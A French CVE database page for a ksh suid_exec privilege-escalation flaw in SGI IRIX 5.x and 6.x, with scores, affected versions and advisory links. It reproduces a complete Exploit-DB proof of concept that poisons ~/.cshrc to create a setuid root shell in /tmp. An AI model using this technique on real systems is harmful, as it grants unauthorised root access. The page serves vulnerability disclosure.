Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Buffer overflow in Korn Shell (ksh) suid_exec program on IRIX 6.x and earlier, and possibly other operating systems, allows local users to gain root privileges.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.2 | AV:L/AC:L/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 19353
Date de publication : 1996-12-01 23h00 +00:00
Auteur : Yuri Volobuev
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/467/info
A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with it's Irix operating system, versions 5.x and 6.x. Suid_exec is part of the Korn shell package, and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for the shell, such as a .cshrc. By placing malicious code in a .cshrc, and properly running suid_exec, commands can be executed as root.
% setenv | grep SHELL
SHELL=/bin/tcsh
% mv ~/.cshrc ~/.cshrc.old
% cat > ~/.cshrc
cp /bin/sh /tmp
chmod a+rsx /tmp/sh
^D
% cat > expl.c
main()
{
execl("/sbin/suid_exec","/bin/su","/bin/su",0);
}
^D
% cc expl.c -o expl.c
% ./expl
Too many ('s.
% ls -l /tmp/sh
-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh*
Products Mentioned
Configuraton 0
Sgi>>Irix >> Version 5.0
Sgi>>Irix >> Version 5.0.1
- Sgi>>Irix >> Version 5.0.1 (Open CPE detail)
Sgi>>Irix >> Version 5.1
- Sgi>>Irix >> Version 5.1 (Open CPE detail)
Sgi>>Irix >> Version 5.1.1
- Sgi>>Irix >> Version 5.1.1 (Open CPE detail)
Sgi>>Irix >> Version 5.2
- Sgi>>Irix >> Version 5.2 (Open CPE detail)
Sgi>>Irix >> Version 5.3
- Sgi>>Irix >> Version 5.3 (Open CPE detail)
- Sgi>>Irix >> Version 5.3 (Open CPE detail)
Sgi>>Irix >> Version 6.0
- Sgi>>Irix >> Version 6.0 (Open CPE detail)
Sgi>>Irix >> Version 6.0.1
- Sgi>>Irix >> Version 6.0.1 (Open CPE detail)
- Sgi>>Irix >> Version 6.0.1 (Open CPE detail)
Sgi>>Irix >> Version 6.0.1
- Sgi>>Irix >> Version 6.0.1 (Open CPE detail)
Sgi>>Irix >> Version 6.1
- Sgi>>Irix >> Version 6.1 (Open CPE detail)
Sgi>>Irix >> Version 6.2
- Sgi>>Irix >> Version 6.2 (Open CPE detail)
Sgi>>Irix >> Version 6.3
- Sgi>>Irix >> Version 6.3 (Open CPE detail)
Sgi>>Irix >> Version 6.4
- Sgi>>Irix >> Version 6.4 (Open CPE detail)
Références
http://ciac.llnl.gov/ciac/bulletins/h-15a.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
Tags : third-party-advisory, government-resource, x_refsource_CIAC
ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-96.17.suid_exec.vul
Tags : third-party-advisory, x_refsource_AUSCERT
Tags : third-party-advisory, x_refsource_AUSCERT
ftp://patches.sgi.com/support/free/security/advisories/19980405-01-I
Tags : vendor-advisory, x_refsource_SGI
Tags : vendor-advisory, x_refsource_SGI
2025©
tesweb SA
